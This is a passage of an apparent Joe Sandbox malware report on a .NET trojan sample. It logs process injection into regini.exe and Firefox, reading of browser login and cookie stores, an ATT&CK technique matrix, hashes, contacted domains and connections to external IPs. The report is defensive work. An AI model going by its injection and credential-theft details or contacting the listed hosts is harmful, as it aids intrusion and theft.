                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtOpenSection: Direct from: 0x77672E0C
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtQueryVolumeInformationFile: Direct from: 0x77672F2C
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtAllocateVirtualMemory: Direct from: 0x776748EC
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtSetInformationThread: Direct from: 0x776663F9
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtReadVirtualMemory: Direct from: 0x77672E8C
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtCreateKey: Direct from: 0x77672C6C
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtClose: Direct from: 0x77672B6C
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtWriteVirtualMemory: Direct from: 0x7767490C
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtAllocateVirtualMemory: Direct from: 0x77673C9C
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtDelayExecution: Direct from: 0x77672DDC
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtCreateUserProcess: Direct from: 0x7767371C
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtQuerySystemInformation: Direct from: 0x77672DFC
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtQueryInformationProcess: Direct from: 0x77672C26
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtResumeThread: Direct from: 0x77672FBC
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtReadFile: Direct from: 0x77672ADC
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtAllocateVirtualMemory: Direct from: 0x77672BFC
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtResumeThread: Direct from: 0x776736AC
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtSetInformationProcess: Direct from: 0x77672C5C
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtMapViewOfSection: Direct from: 0x77672D1C
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtNotifyChangeKey: Direct from: 0x77673C2C
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtWriteVirtualMemory: Direct from: 0x77672E3C
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtCreateMutant: Direct from: 0x776735CC
                Source: C:\Users\user\Desktop\file.exe Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\file.exe Section loaded: NULL target: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\file.exe Section loaded: NULL target: C:\Windows\SysWOW64\regini.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: NULL target: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe protection: read write
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: NULL target: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\regini.exe Thread register set: target process: 8012
                Source: C:\Windows\SysWOW64\regini.exe Thread APC queued: target process: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe Process created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"
                Source: C:\Windows\SysWOW64\regini.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: QmkRHPDwxbW.exe, 00000005.00000000.1423113339.00000000012F0000.00000002.00000001.00040000.00000000.sdmp, QmkRHPDwxbW.exe, 00000005.00000002.3754281757.00000000012F0000.00000002.00000001.00040000.00000000.sdmp, QmkRHPDwxbW.exe, 00000008.00000000.1570468853.0000000001A50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: QmkRHPDwxbW.exe, 00000005.00000000.1423113339.00000000012F0000.00000002.00000001.00040000.00000000.sdmp, QmkRHPDwxbW.exe, 00000005.00000002.3754281757.00000000012F0000.00000002.00000001.00040000.00000000.sdmp, QmkRHPDwxbW.exe, 00000008.00000000.1570468853.0000000001A50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: QmkRHPDwxbW.exe, 00000005.00000000.1423113339.00000000012F0000.00000002.00000001.00040000.00000000.sdmp, QmkRHPDwxbW.exe, 00000005.00000002.3754281757.00000000012F0000.00000002.00000001.00040000.00000000.sdmp, QmkRHPDwxbW.exe, 00000008.00000000.1570468853.0000000001A50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: EProgram Manager
                Source: QmkRHPDwxbW.exe, 00000005.00000000.1423113339.00000000012F0000.00000002.00000001.00040000.00000000.sdmp, QmkRHPDwxbW.exe, 00000005.00000002.3754281757.00000000012F0000.00000002.00000001.00040000.00000000.sdmp, QmkRHPDwxbW.exe, 00000008.00000000.1570468853.0000000001A50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3755526536.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3755365242.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1502482858.0000000001AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1502647624.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\regini.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match | File source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3755526536.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3755365242.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1502482858.0000000001AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1502647624.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
[Behavior graph] ID: 1561747, Sample: file.exe, Startdate: 24/11/2024, Architecture: WINDOWS, Score: 100

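| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| file.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.Remcos | |
| file.exe | 38% | Virustotal | | Browse |
| file.exe | 100% | Joe Sandbox ML | | |

No Antivirus matches

No Antivirus matches

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| tempatmudisini06.click | 3% | Virustotal | | Browse |
| snehasfashion.shop | 0% | Virustotal | | Browse |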
                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1561747
                                                                            Start date and time:2024-11-24 08:20:19 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 11m 13s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:12
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:2
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:file.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@7/2@13/13
                                                                            EGA Information:
                                                                            • Successful, ratio: 75%
                                                                            HCA Information:
                                                                            • Successful, ratio: 96%
                                                                            • Number of executed functions: 117
                                                                            • Number of non-executed functions: 301
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Execution Graph export aborted for target QmkRHPDwxbW.exe, PID 5988 because it is empty
                                                                            • Not all processes were analyzed, report is missing behavior information
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            Time | Type | Description
                                                                            02:21:11 | API Interceptor | 2x Sleep call for process: file.exe modified
                                                                            02:22:09 | API Interceptor | 10114548x Sleep call for process: regini.exe modified
                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1216
                                                                            Entropy (8bit):5.34331486778365
                                                                            Encrypted:false
                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                            Malicious:true
                                                                            Reputation:high, very likely benign file
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                            Process:C:\Windows\SysWOW64\regini.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                            Category:dropped
                                                                            Size (bytes):196608
                                                                            Entropy (8bit):1.1211596417522893
                                                                            Encrypted:false
                                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                            MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                            SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                            SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                            SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):7.556527254696405
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            File name:file.exe
                                                                            File size:1'026'560 bytes
                                                                            MD5:df31a2ccd06e0f1075f7280d156f5237
                                                                            SHA1:d2583bb274455234c26d299931edf04537bc76ef
                                                                            SHA256:2e64ed10f0c61a872dbc4cc8ac023e947db0c9642044dbe33af671cff97135a0
                                                                            SHA512:6e195da7fdae985df52d87d87b1fe9013c037ee78cd253a69969c07165755a800fdc853c8e5525e833235969acbcff11bac7d4ecb1b89b34665bff9214668c3d
                                                                            SSDEEP:24576:rzJkzxWpwSGN8LOYrMOUHWMm2iqVW8gS:rzJCW9GGH1xMPiqUG
                                                                            TLSH:1925BF20B7F89D67E27AA1F3DB84421097B6D141767BE7AA0CC664CE26C27310783D27
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....>g..............0......(........... ........@.. ....................................@................................
                                                                            Icon Hash:130b253d1931012d
                                                                            Entrypoint:0x4f9f86
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x673E8CC7 [Thu Nov 21 01:28:39 2024 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                            Instruction
                                                                            jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf9f34 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xfa000 | 0x2588 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xfe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xf7f8c | 0xf8000 | 2b9d2a14d6d27ee980580366adf1d20c | False | 0.7489820911038306 | data | 7.558811288088065 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xfa000 | 0x2588 | 0x2600 | e48c7a4f0adf2d991907ee0ce26bd908 | False | 0.8754111842105263 | data | 7.577346493614373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xfe000 | 0xc | 0x200 | 7b1861b0e2b6e98c24f4e599da8719de | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xfa100 | 0x2016 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9504504504504504
RT_GROUP_ICON | 0xfc128 | 0x14 | data | | | 1.05
RT_VERSION | 0xfc14c | 0x23c | data | | | 0.46853146853146854
RT_MANIFEST | 0xfc398 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                            Nov 24, 2024 08:22:22.093053102 CET8049870103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:23.488075018 CET4987080192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:23.530997992 CET8049870103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:23.531101942 CET4987080192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:23.531137943 CET8049870103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:23.531199932 CET4987080192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:23.607619047 CET8049870103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:23.607745886 CET4987080192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:24.506669998 CET4987880192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:24.626420975 CET8049878103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:24.626538992 CET4987880192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:24.641484976 CET4987880192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:24.761002064 CET8049878103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:24.761034012 CET8049878103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:26.144464016 CET4987880192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:26.222321987 CET8049878103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:26.222352982 CET8049878103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:26.222461939 CET4987880192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:26.222461939 CET4987880192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:26.264008045 CET8049878103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:26.264168024 CET4987880192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:27.163033009 CET4988580192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:27.282658100 CET8049885103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:27.282742977 CET4988580192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:27.292931080 CET4988580192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:27.412417889 CET8049885103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:28.903328896 CET8049885103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:28.903395891 CET8049885103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:28.903616905 CET4988580192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:28.907432079 CET4988580192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:29.026882887 CET8049885103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:34.644455910 CET4990180192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:34.764087915 CET8049901154.23.184.95192.168.2.10
